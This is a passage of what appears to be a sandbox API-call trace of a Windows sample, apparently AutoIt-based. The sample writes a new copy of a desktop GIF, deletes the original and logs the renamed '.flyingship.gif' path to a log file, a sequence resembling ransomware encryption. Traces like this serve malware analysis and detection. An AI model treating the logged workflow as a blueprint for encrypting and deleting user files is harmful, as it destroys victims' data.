Size=0x4) returned 0x6bb3f8 [0077.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0077.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0077.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0077.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.052] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0077.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0077.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0077.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0077.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa) returned 0x76ae80 [0077.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x76ae80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0077.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.052] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0077.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0077.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0077.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0077.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0077.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0077.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0077.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0077.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0077.052] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0077.053] WriteFile (in: hFile=0x140, lpBuffer=0x771fe8*, nNumberOfBytesToWrite=0xfb13, lpNumberOfBytesWritten=0x61e598, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesWritten=0x61e598*=0xfb13, lpOverlapped=0x0) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0077.053] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0077.054] FreeLibrary (hLibModule=0x76d30000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5d8 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0077.054] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0077.054] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.055] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.077] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.077] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.077] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0077.077] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.077] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.077] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0077.079] FreeLibrary (hLibModule=0x76d30000) returned 1 [0077.079] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.079] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.079] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.079] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif", lpFilePart=0x0) returned 0x39 [0077.079] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x186c4af0, ftCreationTime.dwHighDateTime=0x1d5dd9a, ftLastAccessTime.dwLowDateTime=0x2cc965b0, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0xcaa65560, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xfb13, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="8dBnuAEyPilbFpD.gif", cAlternateFileName="8DBNUA~1.GIF")) returned 0x6b89f8 [0077.079] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8dbnuaeypilbfpd.gif")) returned 1 [0077.082] FindNextFileW (in: hFindFile=0x6b89f8, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x186c4af0, ftCreationTime.dwHighDateTime=0x1d5dd9a, ftLastAccessTime.dwLowDateTime=0x2cc965b0, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0xcaa65560, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xfb13, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="8dBnuAEyPilbFpD.gif", cAlternateFileName="8DBNUA~1.GIF")) returned 0 [0077.083] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0077.083] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.083] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.083] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0077.083] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0077.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0077.083] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0077.083] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0077.083] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0077.083] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0077.083] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0077.083] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.084] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0077.084] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.084] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0077.084] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0077.084] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x471, lpOverlapped=0x0) returned 1 [0077.084] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0077.084] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x471, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.084] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0077.084] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.084] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0077.084] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0077.084] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0077.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.flyingship.gif\r\n", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0077.084] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x47) returned 0x76f100 [0077.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.flyingship.gif\r\n", cchWideChar=71, lpMultiByteStr=0x76f100, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.flyingship.gif\r\n", lpUsedDefaultChar=0x0) returned 71 [0077.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0077.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0077.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f100 | out: hHeap=0x650000) returned 1 [0077.085] WriteFile (in: hFile=0x140, lpBuffer=0x6d34d8*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x6d34d8*, lpNumberOfBytesWritten=0x61eef4*=0x46, lpOverlapped=0x0) returned 1 [0077.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0077.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0077.085] CloseHandle (hObject=0x140) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0077.086] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0077.086] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5e8 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0077.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0077.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0077.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0077.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0077.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0077.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0077.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0077.088] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0077.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0077.088] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0077.088] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0077.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0077.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0077.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0077.088] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0077.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0077.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0077.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0077.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690900 [0077.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0077.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0077.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0077.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0077.088] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0077.088] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0077.089] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e630 [0077.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 